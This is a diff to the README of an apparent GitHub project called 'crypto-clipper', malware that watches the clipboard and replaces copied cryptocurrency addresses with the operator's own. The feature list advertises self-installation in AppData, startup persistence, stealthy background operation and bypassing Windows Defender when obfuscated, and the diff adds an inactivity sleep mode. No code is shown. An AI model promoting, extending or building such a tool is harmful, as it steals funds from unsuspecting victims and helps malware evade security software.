RealZZART3XX/crypto-clipper/README.md

 - **Monitors clipboard**: Tracks clipboard changes in real-time to detect cryptocurrency addresses.
 - **Address Recognition**: Supports popular cryptocurrency addresses such as Bitcoin (BTC), Ethereum (ETH), Litecoin (LTC), Monero (XMR), Ripple (XRP), Dogecoin (DOGE), and more.
-- **Clipboard Replacement**: Replaces detected cryptocurrency addresses with custom labels like "BTC Address", "ETH Address", etc (change with yours addresses).
+- **Clipboard Replacement**: Replaces detected cryptocurrency addresses with custom labels like "BTC Address", "ETH Address", etc (change with your own addresses).
 - **Self-installation**: Installs itself in the user’s `AppData` directory and ensures it starts with Windows.
 - **Single Instance**: Ensures only one instance of the program runs at a time using a mutex.
 - **Low Resource Consumption**: The application is designed to be lightweight and uses minimal system resources, making it ideal for running silently in the background.
 - **Discreet Operation**: Operates in the background without noticeable impact on the user’s experience.
 It is designed to be stealthy, and when obfuscated, it can bypass most security software (including Windows Defender).
+- **Automatic Sleep Mode**: The application automatically pauses clipboard monitoring after a period of inactivity (e.g., no mouse movement or clipboard activity for a set duration), reducing unnecessary resource consumption.

 ## Supported Cryptocurrencies 💰